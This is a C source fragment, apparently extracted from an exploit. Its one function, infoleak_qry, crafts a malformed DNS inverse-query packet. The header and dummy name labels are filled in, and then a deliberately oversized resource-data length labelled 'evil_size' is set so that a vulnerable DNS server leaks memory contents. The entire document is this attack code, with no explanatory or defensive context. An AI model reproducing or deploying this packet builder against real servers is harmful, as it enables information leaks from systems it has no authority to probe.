
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int rd; int ra; void* arcount; void* ancount; void* nscount; void* qdcount; int opcode; void* id; } ;
typedef TYPE_1__ HEADER ;


 int BUFFSIZE ;
 int IQUERY ;
 int PUTLONG (int,char*) ;
 int PUTSHORT (int,char*) ;
 int T_A ;
 void* htons (int) ;
 int memset (char*,int ,int ) ;
 int printf (char*,int) ;

int infoleak_qry(char* buff)
{
        HEADER* hdr;
        int n, k;
        char* ptr;
        int qry_space = 12;
        int dummy_names = 7;
        int evil_size = 0xff;

        memset(buff, 0, BUFFSIZE);
        hdr = (HEADER*)buff;

        hdr->id = htons(0xbeef);
        hdr->opcode = IQUERY;
        hdr->rd = 1;
        hdr->ra = 1;
        hdr->qdcount = htons(0);
        hdr->nscount = htons(0);
        hdr->ancount = htons(1);
        hdr->arcount = htons(0);


 ptr = buff + sizeof(HEADER);
 printf("[d] HEADER is %d long\n", sizeof(HEADER));

 n = 62;

 for(k=0; k < dummy_names; k++)
 {
  *ptr++ = n;
  ptr += n;
 }
 ptr += 1;

        PUTSHORT(1 , ptr);
        PUTSHORT(T_A, ptr);
        PUTLONG(1, ptr);

 PUTSHORT(evil_size, ptr);

 return(ptr - buff + qry_space);

}
